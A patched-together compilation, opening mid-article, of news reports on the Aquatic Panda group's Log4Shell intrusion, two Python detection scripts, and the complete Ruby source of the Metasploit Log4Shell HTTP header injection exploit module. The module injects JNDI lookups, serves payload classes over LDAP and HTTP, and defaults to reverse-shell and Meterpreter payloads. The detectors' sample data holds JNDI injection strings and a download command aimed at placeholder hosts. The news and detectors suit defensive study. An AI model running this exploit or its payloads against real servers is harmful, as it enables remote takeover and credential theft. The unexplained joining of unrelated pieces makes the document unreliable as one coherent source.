The threat actors downloaded additional scripts and then executed a Base64-encoded command via PowerShell to retrieve malware from their toolkit. They also retrieved three files with VBS file extensions from remote infrastructure, which they then decoded.

“Based on the telemetry available, OverWatch believes these files likely constituted a reverse shell, which was loaded into memory via DLL search-order hijacking,” researchers wrote.

Aquatic Panda eventually made multiple attempts to harvest credentials by dumping the memory of the LSASS process using living-off-the-land binaries rdrleakdiag.exe and cdump.exe, a renamed copy of createdump.exe.

“The threat actor used winRAR to compress the memory dump in preparation for exfiltration before attempting to cover their tracks by deleting all executables from the ProgramData and Windows\temp\ directories,” researchers wrote.

The victim organization eventually patched the vulnerable application, which prevented further action from Aquatic Panda on the host and stopped the attack, researchers said.
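The post-exploitation steps described above (commands launched under the Tomcat service, Base64-encoded PowerShell, LSASS dumping with rdrleakdiag.exe and a renamed createdump.exe, WinRAR staging of the dump) all surface in process-creation telemetry. The Python below is an added example, not CrowdStrike's or OverWatch's detection logic; it assumes Sysmon-style field names (Image, ParentImage, CommandLine, OriginalFileName) and runs over constructed events whose paths, PIDs and hosts are placeholders.

```python
import base64
import re
from pathlib import PureWindowsPath

# Field names follow Sysmon EventID 1 (Image, ParentImage, CommandLine,
# OriginalFileName); that mapping is an assumption of this added example.
SHELLS_AND_DOWNLOADERS = {"cmd.exe", "powershell.exe", "bash.exe", "curl.exe", "wget.exe"}

def _base(path):
    return PureWindowsPath(path).name.lower()

def decode_encoded_powershell(cmdline):
    """Decode the script behind 'powershell -enc <b64>' (UTF-16LE), else None."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(ev):
    """Return finding tags for one process-creation event (empty list if benign)."""
    img, parent, cmd = _base(ev["Image"]), ev.get("ParentImage", "").lower(), ev.get("CommandLine", "")
    tags = []
    # A shell or downloader started under the Tomcat service: the Log4Shell foothold above.
    if "tomcat" in parent and img in SHELLS_AND_DOWNLOADERS:
        tags.append("tomcat_spawned_shell_or_downloader")
    # rdrleakdiag.exe, or createdump.exe running under another file name (cdump.exe).
    if img == "rdrleakdiag.exe" or (ev.get("OriginalFileName", "").lower() == "createdump.exe"
                                    and img != "createdump.exe"):
        tags.append("lolbin_memory_dump")
    if img == "powershell.exe" and decode_encoded_powershell(cmd) is not None:
        tags.append("encoded_powershell")
    if img in {"winrar.exe", "rar.exe"} and ".dmp" in cmd.lower():
        tags.append("archive_of_memory_dump")   # dump staged for exfiltration
    return tags

def scan(events):
    """Map event index -> tags for every event that produced a finding."""
    return {i: t for i, ev in enumerate(events) if (t := classify(ev))}

# Constructed sample events; paths, PIDs and hosts are placeholders.
ENCODED = base64.b64encode("whoami".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Tomcat\bin\tomcat9.exe",
     "CommandLine": r"curl.exe -o C:\ProgramData\a.vbs http://placeholder.invalid/a.vbs"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": f"powershell.exe -enc {ENCODED}"},
    {"Image": r"C:\Windows\System32\rdrleakdiag.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"rdrleakdiag.exe /p 712 /o C:\Windows\Temp"},
    {"Image": r"C:\ProgramData\cdump.exe", "OriginalFileName": "createdump.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "cdump.exe 712"},
    {"Image": r"C:\Program Files\WinRAR\WinRAR.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"WinRAR.exe a C:\Windows\Temp\a.rar C:\Windows\Temp\lsass.dmp"},
    {"Image": r"C:\Windows\System32\svchost.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for i, tags in scan(SAMPLE_EVENTS).items():
        print(i, tags)
```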

New Year, Same Exploit

As 2021 comes to a close, it’s likely that Log4Shell, and the exploits attackers have built around it, will carry their disruption into the new year.

“The discussion globally around Log4j has been intense, putting many organizations on edge,” OverWatch researchers wrote. “No organization wants to hear about such a potentially destructive vulnerability affecting its networks.”

Indeed, the flaw already has created considerable headaches for organizations and security researchers alike since its discovery earlier this month. Attackers immediately jumped on Log4Shell, spawning 60 variants of the original exploit in the 24-hour period after the flaw was first revealed. Though Apache moved quickly to patch it, the fix also turned problematic, creating a vulnerability of its own.

Moreover, Aquatic Panda is not the first organized cybercrime group to recognize the opportunity to exploit Log4Shell, and it is likely not the last. On Dec. 20, the Russia-based Conti ransomware gang, known for its sophistication and ruthlessness, became the first professional crimeware outfit to adopt and weaponize the Log4Shell vulnerability with the creation of a holistic attack chain.

CrowdStrike urged organizations to remain abreast of the latest mitigations available for Log4Shell and overall Log4j vulnerabilities as the situation evolves.

Chinese APT Hackers Used Log4Shell Exploit to Target Academic Institution


Description


A never-before-seen China-based targeted intrusion adversary dubbed Aquatic Panda has been observed leveraging critical flaws in the Apache Log4j logging library as an access vector to perform various post-exploitation operations, including reconnaissance and credential harvesting on targeted systems.

Cybersecurity firm CrowdStrike said the infiltration, which was ultimately foiled, was aimed at an unnamed “large academic institution.” The state-sponsored group is believed to have been operating since mid-2020 in pursuit of intelligence collection and industrial espionage, with its attacks primarily directed against companies in the telecommunications, technology, and government sectors.

The attempted intrusion exploited the newly discovered Log4Shell flaw (CVE-2021-44228, CVSS score: 10.0) to gain access to a vulnerable instance of the VMware Horizon desktop and app virtualization product, followed by running a series of malicious commands orchestrated to fetch threat actor payloads hosted on a remote server.


“A modified version of the Log4j exploit was likely used during the course of the threat actor’s operations,” the researchers noted, adding it involved the use of an exploit that was published in GitHub on December 13, 2021.

Aquatic Panda’s malicious behavior went beyond conducting reconnaissance of the compromised host, starting with making an effort to stop a third-party endpoint detection and response (EDR) service, before proceeding to retrieve next-stage payloads designed to obtain a reverse shell and harvest credentials.

But after the victim organization was alerted to the incident, the entity “was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host.” In light of the attack’s successful disruption, the exact intent remains unknown.

Log4Shell HTTP Header Injection


Description

Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints.

This module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit and load a payload.

The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP server in addition to the LDAP server that the target can connect to. The targeted application must have the trusted code base option enabled for this technique to work.

The non-Automatic targets deliver a payload via a serialized Java object. This does not require Metasploit to run an HTTP server and instead leverages the LDAP server to deliver the serialized object. The target application in this case must be compatible with the user-specified JAVA_GADGET_CHAIN option.
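The injection the module relies on is a JNDI lookup string placed in an HTTP header that the application logs. As an added detection-side example (not part of the module or the article), the Python below normalizes the nested-lookup and percent-encoded variants of that string, reports which header carried it, and extracts the scheme and host of the callback for triage; the sample requests and hosts are constructed.

```python
"""Detect Log4Shell JNDI lookup strings in HTTP request headers (added example)."""
import re
import urllib.parse

# ${lower:X} / ${upper:X} resolve statically to a cased X.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# Any innermost "${...:-default}" resolves to its default, e.g. ${::-j}, ${env:NOPE:-j}.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The token vulnerable Log4j 2.x versions hand to JNDI; scheme and host are captured.
_JNDI_URI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)://([^/}\s]+)", re.IGNORECASE)

def normalize(value, max_rounds=20):
    """Collapse nested lookups so ${${lower:j}ndi:...} reads ${jndi:...}."""
    s = urllib.parse.unquote(value)          # percent-encoded variants are common
    for _ in range(max_rounds):              # bounded so odd input cannot loop forever
        prev = s
        s = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(), s)
        s = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), s)
        if s == prev:
            break
    return s

def find_jndi(value):
    """Return (scheme, host[:port]) of the first JNDI lookup in value, or None."""
    m = _JNDI_URI.search(normalize(value))
    return (m.group(1).lower(), m.group(2)) if m else None

def scan_headers(headers):
    """Return [(header_name, scheme, host)] for every header carrying a lookup."""
    hits = []
    for name, value in headers.items():
        found = find_jndi(value)
        if found:
            hits.append((name, found[0], found[1]))
    return hits

# Constructed sample requests; hosts are placeholders, not real indicators.
SAMPLE_REQUESTS = [
    {"User-Agent": "Mozilla/5.0", "X-Api-Version": "${jndi:ldap://attacker.example:389/a}"},
    {"User-Agent": "${${lower:j}${upper:n}di:${::-l}dap://attacker.example/x}"},
    {"Referer": "%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fy%7D"},
    {"X-Forwarded-For": "${${env:NaN:-j}ndi:rmi://attacker.example:1099/obj}"},
    {"User-Agent": "curl/7.79.1", "Accept": "*/*"},
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(scan_headers(req) or "clean")
```

The scheme and host returned by find_jndi are what a responder blocks at the egress proxy and pivots on in DNS and LDAP logs; Log4j 2.15 and later no longer resolve these lookups by default.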

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Log4Shell
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::CheckModule
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(_info = {})
    super(
      'Name' => 'Log4Shell HTTP Header Injection',
      'Description' => %q{
        Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration,
        log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints.

        This module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that
        will trigger an LDAP connection to Metasploit and load a payload.

        The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP
        server in addition to the LDAP server that the target can connect to. The targeted application must have the
        trusted code base option enabled for this technique to work.

        The non-Automatic targets deliver a payload via a serialized Java object. This does not require Metasploit to
        run an HTTP server and instead leverages the LDAP server to deliver the serialized object. The target
        application in this case must be compatible with the user-specified JAVA_GADGET_CHAIN option.
      },
      'Author' => [
        'Michael Schierl', # Technical guidance, examples, and patience - all of the Jedi stuff
        'juan vazquez', # 2011-3544 building blocks reused in this module
        'sinn3r', # 2011-3544 building blocks reused in this module
        'Spencer McIntyre', # Kickoff on 2021-44228 work, improvements, and polish required for formal acceptance
        'RageLtMan <rageltman[at]sempervictus>' # Metasploit module and infrastructure
      ],
      'References' => [
        [ 'CVE', '2021-44228' ],
      ],
      'DisclosureDate' => '2021-12-09',
      'License' => MSF_LICENSE,
      'DefaultOptions' => {
        'SRVPORT' => 389,
        'WfsDelay' => 30,
        'CheckModule' => 'auxiliary/scanner/http/log4shell_scanner'
      },
      'Targets' => [
        [
          'Automatic', {
            'Platform' => 'java',
            'Arch' => [ARCH_JAVA],
            'RemoteLoad' => true,
            'DefaultOptions' => {
              'PAYLOAD' => 'java/shell_reverse_tcp'
            }
          }
        ],
        [
          'Windows', {
            'Platform' => 'win',
            'RemoteLoad' => false,
            'DefaultOptions' => {
              'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
            }
          },
        ],
        [
          'Linux', {
            'Platform' => 'unix',
            'RemoteLoad' => false,
            'Arch' => [ARCH_CMD],
            'DefaultOptions' => {
              'PAYLOAD' => 'cmd/unix/reverse_bash'
            }
          },
        ]
      ],
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [IOC_IN_LOGS],
        'AKA' => ['Log4Shell', 'LogJam'],
        'Reliability' => [REPEATABLE_SESSION],
        'RelatedModules' => [ 'auxiliary/scanner/http/log4shell_scanner' ]
      }
    )
    register_options([
      OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),
      OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),
      OptString.new('HTTP_HEADER', [ false, 'The HTTP header to inject into' ]),
      OptEnum.new('JAVA_GADGET_CHAIN', [
        true, 'The Java gadget chain to use for deserialization', 'CommonsBeanutils1',
        Msf::Exploit::JavaDeserialization.gadget_chains
      ], conditions: %w[TARGET != Automatic]),
      OptPort.new('HTTP_SRVPORT', [true, 'The HTTP server port', 8080], conditions: %w[TARGET == Automatic])
    ])
    register_advanced_options([
      OptPort.new('HttpListenerBindPort', [false, 'The port to bind to if different from HTTP_SRVPORT'])
    ])
  end

  def check
    validate_configuration!

    @checkcode = super
  end

  def check_options
    opts = { 'LDAP_TIMEOUT' => datastore['WfsDelay'], 'URIS_FILE' => nil }
    opts['HEADERS_FILE'] = nil unless datastore['HTTP_HEADER'].blank?
    opts
  end

  def resource_url_string
    "http#{datastore['SSL'] ? 's' : ''}://#{datastore['SRVHOST']}:#{datastore['HTTP_SRVPORT']}#{resource_uri}"
  end

  #
  # Use Ruby Java bridge to create a Java-natively-serialized object
  #
  # @return [String] Marshalled serialized byteArray of the loader class
  def byte_array_payload(pay_class = 'metasploit.PayloadFactory')
    jar = generate_payload.encoded_jar
    serialized_class_from_jar(jar, pay_class)
  end

  #
  # Insert PayloadFactory in Java payload JAR
  #
  # @param jar [Rex::Zip::Jar] payload JAR to update
  # @return [Rex::Zip::Jar] updated payload JAR
  def inject_jar_payload_factory(jar = generate_payload.encoded_jar)
    # From exploits/multi/browser/java_rhino - should probably go to lib
    paths = [
      [ 'metasploit/PayloadFactory.class' ]
    ]
    paths.each do |path|
      1.upto(path.length - 1) do |idx|
        full = path[0, idx].join('/') + '/'
        jar.add_file(full, '') unless jar.entries.map(&:name).include?(full)
      end
      File.open(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-44228', path), 'rb') do |fd|
        data = fd.read(fd.stat.size)
        jar.add_file(path.join('/'), data)
      end
    end
    jar
  end

  def build_ldap_search_response_payload
    if target['RemoteLoad']
      build_ldap_search_response_payload_remote(resource_url_string)
    else
      build_ldap_search_response_payload_inline(datastore['JAVA_GADGET_CHAIN'])
    end
  end

  ## HTTP service callbacks
  #
  # Handle HTTP requests and responses
  #
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    vprint_good("Payload requested by #{cli.peerhost} using #{agent}")
    pay = regenerate_payload(cli)
    jar = inject_jar_payload_factory(pay.encoded_jar)
    send_response(cli, 200, 'OK', jar)
  end

  #
  # Create an HTTP response and then send it
  #
  def send_response(cli, code, message = 'OK', html = '')
    proto = Rex::Proto::Http::DefaultProtocol
    res = Rex::Proto::Http::Response.new(code, message, proto)
    res['Content-Type'] = 'application/java-archive'
    res.body = html
    cli.send_response(res)
  end

  def exploit
    validate_configuration!
    if datastore['HTTP_HEADER'].blank?
      targetinfo = (@checkcode&.details || []).reject { |ti| ti[:headers]&.empty? }.first
      http_header = targetinfo[:headers].keys.first if targetinfo
      fail_with(Failure::BadConfig, 'No HTTP_HEADER was specified and none were found automatically') unless http_header

      print_good("Automatically identified vulnerable header: #{http_header}")
    else
      http_header = datastore['HTTP_HEADER']
    end

    # LDAP service
    start_service
    # HTTP service
    if target['RemoteLoad']
      start_http_service('ServerPort' => (datastore['HttpListenerBindPort'].blank? ? datastore['HTTP_SRVPORT'] : datastore['HttpListenerBindPort']).to_i)
    end
    # HTTP request initiator
    send_request_raw(
      'uri' => normalize_uri(target_uri),
      'method' => datastore['HTTP_METHOD'],
      'headers' => { http_header => log4j_jndi_string }
    )
    sleep(datastore['WfsDelay'])
    handler
  ensure
    cleanup
  end

  #
  # Kill HTTP & LDAP services (shut them down and clear resources)
  #
  def cleanup
    # Clean and stop HTTP server
    if @http_service
      begin
        @http_service.remove_resource(datastore['URIPATH'])
        @http_service.deref
        @http_service.stop
        @http_service = nil
      rescue StandardError => e
        print_error("Failed to stop http server due to #{e}")
      end
    end
    super
  end

  def validate_configuration!
    super

    if datastore['HTTP_HEADER'].blank? && !datastore['AutoCheck']
      fail_with(Exploit::Failure::BadConfig, 'Either the AutoCheck option must be enabled or an HTTP_HEADER must be specified.')
    end
  end

  private

  # Boilerplate HTTP service code
  #
  # Returns the configured (or random, if not configured) URI path
  #
  def resource_uri
    path = datastore['URIPATH'] || rand_text_alphanumeric(rand(8..15)) + '.jar'
    path = '/' + path if path !~ %r{^/}
    if path !~ /\.jar$/
      print_status("Appending .jar extension to #{path} as we don't yet serve classpaths")
      path += '.jar'
    end
    datastore['URIPATH'] = path
    return path
  end

  #
  # Handle the HTTP request and return a response.  Code borrowed from:
  # msf/core/exploit/http/server.rb
  #
  def start_http_service(opts = {})
    # Start a new HTTP server
    @http_service = Rex::ServiceManager.start(
      Rex::Proto::Http::Server,
      (opts['ServerPort'] || bindport).to_i,
      opts['ServerHost'] || bindhost,
      datastore['SSL'],
      {
        'Msf' => framework,
        'MsfExploit' => self
      },
      opts['Comm'] || _determine_server_comm(opts['ServerHost'] || bindhost),
      datastore['SSLCert'],
      datastore['SSLCompression'],
      datastore['SSLCipher'],
      datastore['SSLVersion']
    )
    @http_service.server_name = datastore['HTTP::server_name']
    # Default the procedure of the URI to on_request_uri if one isn't
    # provided.
    uopts = {
      'Proc' => method(:on_request_uri),
      'Path' => resource_uri
    }.update(opts['Uri'] || {})
    proto = (datastore['SSL'] ? 'https' : 'http')

    netloc = opts['ServerHost'] || bindhost
    http_srvport = (opts['ServerPort'] || bindport).to_i
    if (proto == 'http' && http_srvport != 80) || (proto == 'https' && http_srvport != 443)
      if Rex::Socket.is_ipv6?(netloc)
        netloc = "[#{netloc}]:#{http_srvport}"
      else
        netloc = "#{netloc}:#{http_srvport}"
      end
    end
    print_status("Serving Java code on: #{proto}://#{netloc}#{uopts['Path']}")

    # Add path to resource
    @service_path = uopts['Path']
    @http_service.add_resource(uopts['Path'], uopts)
  end
end